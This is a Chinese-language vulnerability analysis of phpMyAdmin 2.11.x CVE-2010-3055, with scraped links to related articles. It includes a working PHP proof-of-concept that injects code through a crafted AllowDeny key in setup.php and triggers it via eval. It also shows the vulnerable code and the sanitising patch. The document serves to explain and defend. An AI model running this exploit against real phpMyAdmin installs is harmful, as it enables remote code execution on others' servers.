目录

. 漏洞描述
. 漏洞触发条件
. 漏洞影响范围
. 漏洞代码分析
. 防御方法
. 攻防思考

1. 漏洞描述

The configuration setup script (aka scripts/setup.php) in phpMyAdmin 2.11.x before 2.11.10.1 does not properly restrict key names in its output file, which allows remote attackers to execute arbitrary PHP code via a crafted POST request.

简单地概括这个漏洞如下

. \scripts\setup.php文件会接收用户的POST数据进行配置文件的键值(key-value)赋值,并将结果写入/config/config.inc.php文件
. 代码对用户的输入没有进行有效的过滤,导致黑客可以采用"注入拼接技术",在原本的key-value赋值的"中间",拼接一段任意代码执行
. \scripts\setup.php文件在点击load(也就是用户点击查看配置文件)的时候,采用eval(..的方式进行"变量本地注册",即重新执行一次变量赋值
. 在eval的过程中,之前黑客注入的任何代码,被eval执行了,导致了最终的代码执行

Relevant Link:

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3055
http://threats.io/cve/CVE-2010-3055/

2. 漏洞触发条件

. phpmyadmin下的config文件夹存在
这点和CVE--1151是一样的,setup.php本身不能创建新的目录 . config文件夹、config.inc.php文件可写 . 代码本身存在输入过滤漏洞

0x1: 测试POC

POC的发起需要附带对应的token,在手工测试的时候需要注意这点

<?php
// this is an exploit code for phpMyAdmin 2.11.10 $target_url = "http://host/path/phpmyadmin/script/setup.php"; $token = null; // request 1:获取token
$res = get_response(); // request 2 (add server)
$res = get_response('POST', "token=$token&action=addserver"); // request 3 (save to session)
$res = get_response('POST', "token=$token&action=addserver_real&host=localhost&connect_type=tcp&extension=mysql&auth_type=config&user=root&password=1&submit_save=Add&AllowDeny_order=1&AllowDeny[a][b]['.phpinfo().']=1"); // request 4 (save to file)
$res = get_response('POST', "token=$token&action=save"); // request 5 (load file)
$res = get_response('POST', "token=$token&action=load");
var_dump($res); function get_response($method='GET', $body=null) {
global $target_url, $token;
static $ch = null; if ($ch === null) $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $target_url); if ($method == 'POST') {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
} curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookie.txt'); $res = curl_exec($ch);
$token = get_token($res); return $res;
} function get_token($s) {
if (preg_match('#name="token" value="(.*?)"#', $s, $m)) {
return $m[];
}
}

Relevant Link:

http://forum.antichat.ru/printthread.php?t=239845

3. 漏洞影响范围

phpMyAdmin phpMyAdmin 2.11.
phpMyAdmin phpMyAdmin 2.11.
phpMyAdmin phpMyAdmin 2.11. .
phpMyAdmin phpMyAdmin 2.11. .
phpMyAdmin phpMyAdmin 2.11. .
phpMyAdmin phpMyAdmin 2.11.
phpMyAdmin phpMyAdmin 2.11.
phpMyAdmin phpMyAdmin 2.11.
phpMyAdmin phpMyAdmin 2.11.
phpMyAdmin phpMyAdmin 2.11.
phpMyAdmin phpMyAdmin 2.11.
phpMyAdmin phpMyAdmin 2.11.9.5.
phpMyAdmin phpMyAdmin 2.11.9.5
phpMyAdmin phpMyAdmin 2.11.9.3
phpMyAdmin phpMyAdmin 2.11.8.1
phpMyAdmin phpMyAdmin 2.11.5.2
phpMyAdmin phpMyAdmin 2.11.5.1
phpMyAdmin phpMyAdmin 2.11.2.2
phpMyAdmin phpMyAdmin 2.11.2.1
phpMyAdmin phpMyAdmin 2.11.-dev
phpMyAdmin phpMyAdmin 2.11.1.2
phpMyAdmin phpMyAdmin 2.11.1.1
MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 4.0
Gentoo Linux
Debian Linux 5.0 sparc
Debian Linux 5.0 s/
Debian Linux 5.0 powerpc
Debian Linux 5.0 mipsel
Debian Linux 5.0 mips
Debian Linux 5.0 m68k
Debian Linux 5.0 ia-
Debian Linux 5.0 ia-
Debian Linux 5.0 hppa
Debian Linux 5.0 armel
Debian Linux 5.0 arm
Debian Linux 5.0 amd64
Debian Linux 5.0 alpha
Debian Linux 5.0

Relevant Link:

http://www.securityfocus.com/bid/42591

4. 漏洞代码分析

这个漏洞的利用需要分几步,我们分为注入和利用2步来分析代码中存在的漏洞

0x1: 注入

function get_cfg_val($name, $val)
{
global $crlf; $ret = '';
if (is_array($val))
{
$ret .= $crlf;
foreach ($val as $k => $v)
{
if (!isset($type))
{
if (is_string($k))
{
$type = 'string';
}
elseif (is_int($k))
{
$type = 'int';
$ret .= $name . ' = array(' . $crlf;
}
else
{
// Something unknown...
$ret .= $name. ' = ' . PMA_var_export($val) . ';' . $crlf;
break;
}
}
if ($type == 'string')
{ //如果没有对用户的输入进行转义、过滤、规范化,则会存在拼接型注入的风险
$ret .= get_cfg_val($name . "['$k']", $v);
}
elseif ($type == 'int')
{
$ret .= ' ' . PMA_var_export($v) . ',' . $crlf;
}
}
if (!isset($type))
{
/* Empty array */
$ret .= $name . ' = array();' . $crlf;
}
elseif ($type == 'int')
{
$ret .= ');' . $crlf;
}
$ret .= $crlf;
unset($type);
}
else
{
$ret .= $name . ' = ' . PMA_var_export($val) . ';' . $crlf;
}
return $ret;
}

0x2: 利用

...
case 'load':
if ($fail_dir) {
message('error', 'Reading of configuration disabled because of permissions.');
break;
}
//载入配置文件
$new_cfg = load_config('./config/config.inc.php');
if (!($new_cfg === FALSE)) {
$_SESSION['configuration'] = $new_cfg;
}
$show_info = TRUE;
break;
...

load_config()

function load_config($config_file)
{
if (file_exists($config_file))
{
$success_apply_user_config = FALSE;
$old_error_reporting = error_reporting();
//直接使用eval对配置文件中的key-value进行"变量本地注册",黑客可以采用拼接的方式,在eval即将执行的字符串中拼接入任意代码,从而导致远程代码执行
if (function_exists('file_get_contents'))
{
$success_apply_user_config = eval('?>' . trim(file_get_contents($config_file)));
}
else
{
$success_apply_user_config = eval('?>' . trim(implode("\n", file($config_file))));
}
error_reporting($old_error_reporting);
unset($old_error_reporting);
if ($success_apply_user_config === FALSE)
{
message('error', 'Error while parsing configuration file!');
}
elseif (!isset($cfg) || count($cfg) == )
{
message('error', 'Config file seems to contain no configuration!');
}
else
{
// This must be set
if (!isset($cfg['Servers']))
{
$cfg['Servers'] = array();
}
message('notice', 'Configuration loaded');
compress_servers($cfg);
return $cfg;
}
}
else
{
message('error', 'Configuration file not found!');
}
return FALSE;
}

Relevant Link:

http://sourceforge.net/p/phpmyadmin/bugs/3081/

5. 防御方法

function get_cfg_val($name, $val)
{
global $crlf; $ret = '';
if (is_array($val))
{
$ret .= $crlf;
foreach ($val as $k => $v)
{
if (!isset($type))
{
if (is_string($k))
{
$type = 'string';
}
elseif (is_int($k))
{
$type = 'int';
$ret .= $name . ' = array(' . $crlf;
}
else
{
// Something unknown...
$ret .= $name. ' = ' . PMA_var_export($val) . ';' . $crlf;
break;
}
}
if ($type == 'string')
{
//防御代码
$k = preg_replace('/[^A-Za-z0-9_]/', '_', $k);
//如果没有对用户的输入进行转义、过滤、规范化,则会存在拼接型注入的风险
$ret .= get_cfg_val($name . "['$k']", $v);
}
elseif ($type == 'int')
{
$ret .= ' ' . PMA_var_export($v) . ',' . $crlf;
}
}
if (!isset($type))
{
/* Empty array */
$ret .= $name . ' = array();' . $crlf;
}
elseif ($type == 'int')
{
$ret .= ');' . $crlf;
}
$ret .= $crlf;
unset($type);
}
else
{
$ret .= $name . ' = ' . PMA_var_export($val) . ';' . $crlf;
}
return $ret;
}

在输入的检测中,使用正则进行了"规范化",将输入的key限定在数字和字母的范围之中,有效地防御了这个代码执行漏洞

Relevant Link:

https://github.com/phpmyadmin/phpmyadmin/commit/30c83acddb58d3bbf940b5f9ec28abf5b235f4d2

6. 攻防思考

暂无

Copyright (c) 2014 LittleHann All rights reserved

phpMyadmin /scripts/setup.php Execute Arbitrary PHP Code Via A Crafted POST Request CVE-2010-3055的更多相关文章

  1. phpMyadmin /scripts/setup.php Execute Arbitrary PHP Code Via unserialize Vul Object Injection PMASA-2010-4

    目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 对这个漏洞简单的概括如下 . "/scripts/setup.php&q ...

  2. phpMyadmin /scripts/setup.php Remote Code Injection && Execution CVE-2009-1151

    目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Insufficient output sanitizing when gener ...

  3. phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)

    phpmyadmin 2.x版本 POST /scripts/setup.php HTTP/1.1 Host: 192.168.49.2:8080 Accept-Encoding: gzip, def ...

  4. mvn deploy 报错:Return code is: 400, ReasonPhrase: Bad Request. ->

    mvn deploy 报错:Return code is: 400, ReasonPhrase: Bad Request. -> TEST通过没有报错,但是最终部署到Nexus中时出现错误. 后 ...

  5. maven deploy Return code is: 400, ReasonPhrase: Bad Request.

    最近在自己本地deploy jar 到本地 nexus的时候,报错 Return code is: 400, ReasonPhrase: Bad Request. 解决思路: 1.查看maven pr ...

  6. 解决 android studio 出现:"AndroidStudio:Could not GET 'https://dl.google.com Received status code 400 from server: Bad Request"问题

    一.android studio 编译项目时出现"AndroidStudio:Could not GET 'https://dl.google.com Received status cod ...

  7. Android Studio Gradle build 报错:Received status code 400 from server: Bad Request

    错误提示如下 Could not GET 'https://dl.google.com/dl/android/maven2/com/android/tools/build/gradle/3.1.2/ ...

  8. Python pip install Twisted 出错“Command "c:\python37\python.exe -u -c "import setuptools, tokenize;__file__='C:...\\Twisted\\setup.py'.... failed with error code 1 in C:... \\Twisted"

    如标题所说: python版本是目前最新的3.7.1 结果发现并不是环境问题,而是直接 pip install Twisted 安装的包不兼容 需要手动下载兼容的扩展包Twisted-18.9.0-c ...

  9. VS Code 中使用 GitHub pull request 插件提交代码

    VS Code作为一个代码编辑器,受到很多人的喜爱:其中有很多非常有用的插件/扩展功能,也会极大的提高我们的工作效率. 这里介绍一下GitHub pull request,用来向GitHub提交在VS ...

随机推荐

  1. Linux 网络编程详解十二

    UDP的特点 --无连接 --基于消息的数据传输服务 --不可靠 --UDP更加高效 UDP注意点 --UDP报文可能会丢失,重复 --UDP报文可能会乱序 --UDP缺乏流量控制(UDP缓冲区写满之 ...

  2. Java7并发编程实战(一) 守护线程的创建和运行

    Java里有一种特殊的线程叫做守护(Daemon)线程,这种线程的优先级很低,通常来说,当一个应用程序里面没有其他线程运行的时候,守护线程才运行,当线程是程序中唯一运行的线程时,守护线程执行结束后,J ...

  3. TF400916错误修复办法

    在使用TFS作为研发过程管理工具的时候,如果调整了工作项的状态信息,可能会出现下面的错误: 要解决此问题非常简单: 1.找一台安装了VS2015程序的环境.因为我们使用的是TFS2015,所以需要对应 ...

  4. U-boot与linux的关系

    基本上没有啥关系,U-boot的话你也知道,说白了就像是Dos工具箱,本身算是个精简的Linux系统了,主要是负责硬件的初始化和引导,本身带有一些工具,作为引导程序,常作为嵌入式设备的引导.当真正的系 ...

  5. 使用HttpWebRequest和HtmlAgilityPack抓取网页(拒绝乱码,拒绝正则表达式)

    废话不多说, 直接说需求. 公司的网站需要抓取其他网站的文章,但任务没到我这,同事搞了一下午没搞出来.由于刚刚到公司, 想证明下自己,就把活揽过来了.因为以前做过,觉得应该很简单,但当我开始做的时候, ...

  6. JavaScript中的类型转换(二)

    说明: 本篇主要讨论JavaScript中各运算符对运算数进行的类型转换的影响,本文中所提到的对象类型仅指JavaScript预定义的类型和程序员自己实现的对象,不包括宿主环境定义的特殊对象(比如浏览 ...

  7. 【JavaEE企业应用实战学习记录】struts国际化

    <%-- Created by IntelliJ IDEA. User: Administrator Date: 2016/10/6 Time: 16:26 To change this tem ...

  8. iOS -- 上传多张图片 后台(PHP)代码和上传一张的一样

    // 上传多张图片 - (void)send { // 设置初始记录量为0 self.count = 0; self.upcount = 0; // 设置初始值为NO self.isUploadPic ...

  9. 2-ls 显示目录内容

    ls list directory contents 显示目录内容 [语法]: ls [选项] [参数] [功能介绍] ls指令用来显示目录列表,在Linux系统中有着较高的使用率.ls指令的输出信息 ...

  10. 用自己的话描述wcf中的传输安全与消息安全的区别(三)

    消息交换安全模式 PS:很多书上把transfer security和transport security都翻译成“传输安全”,这样易混淆.我这里把transfer说成消息交换安全. 安全的含义分为验 ...